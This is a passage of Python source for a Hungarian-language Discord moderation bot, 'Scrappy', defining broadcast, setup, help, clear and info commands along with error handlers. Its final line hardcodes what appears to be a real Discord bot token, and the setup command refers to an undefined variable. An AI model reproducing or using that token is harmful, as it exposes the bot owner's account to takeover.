        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)

@unmute.error
async def unmute_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( sunmute )", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)

@bot.command()
@commands.has_permissions(send_messages=True)
async def broadcast(ctx, arg):
    await ctx.message.delete()
    embed = discord.Embed(title="Scrappy | Üzenet", description='▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬', color=discord.Colour.blue())  
    embed.add_field(name="Üzenet:", value=(arg)) 
    embed.set_footer(text="▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬")
    await ctx.send(embed=embed)


@bot.command()
@commands.has_permissions(administrator=True)
async def setup(ctx, arg):
    await ctx.message.delete()
    await guild.create_role(name="Figyelmeztettett", color=discord.Colour.red())


@setup.error
async def setup_error(ctx, error):
    await ctx.message.delete()
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ A Bot Feltelepitéséhez Adminisztrációs Jog Szükséges!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)

@bot.command()
async def help(ctx):
    await ctx.message.delete()
    embed = discord.Embed(title="Scrappy | shelp", description="Jelenleg elérhető parancsok:", color=discord.Colour.blue())

    embed.add_field(name="Bot Feltelepitése:", value="ssetup", inline=False)

    embed.add_field(name="A Bot Prefixe:", value="s", inline=False)

    embed.add_field(name="Alap Parancsok:", value="info, help, broadcast <Üzenet>, clear <mennyiség>", inline=False)
    embed.add_field(name="Fun Parancsok:", value="srnumber,", inline=False)
    embed.add_field(name="Zene Parancsok:", value="Hamarosan", inline=False)
    embed.add_field(name="Moderációs Parancsok:", value="ban, kick, warn, mute, unmute", inline=False)
    embed.add_field(name="WARN:", value="Feltelepitésnél Scrappy Létrehoz egy ( Figyelmeztettett ) Rangot, Ezt a rangot tetszőlegesen állithatod be, akár egy két jog elvonásával ( ugye ezzel adva értelmet a rangnak )", inline=False)
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    
    await ctx.send(embed=embed)


@bot.command()
@commands.has_permissions(manage_messages=True)
async def clear(ctx, amount=100):
    await ctx.message.delete()
    channel = ctx.message.channel
    messages = []
    async for message in channel.history(limit=amount):
              messages.append(message)
    await channel.delete_messages(messages)
    embed = discord.Embed(title="Scrappy | sclear", description=" ✅  Üzenetek törölve.", color=discord.Colour.green())
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
    return

@clear.error
async def clear_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( sclear )", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)

@bot.command()
async def info(ctx):
    await ctx.message.delete()
    embed = discord.Embed(title="Scrappy | sinfo", description="[📌] Információk", color=discord.Colour.green())

    embed.add_field(name="Készitő:", value="Getdown")

    embed.add_field(name="Készités Dátuma:", value="2020.03.16")

    embed.add_field(name="Programnyelv:", value="Python")

    embed.add_field(name="Szerverek", value=f"{len(bot.guilds)}")

    embed.add_field(name="Elérhetőség", value="ＧＥＴＤＯＷＮ#5271")

    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")

    await ctx.send(embed=embed)
                   
bot.run ("Njg5NDY1MjEwNTgyNTk3NzAx.XnMxgw.szJh3vby9mJYi0Q41syFq6Iiuo8")
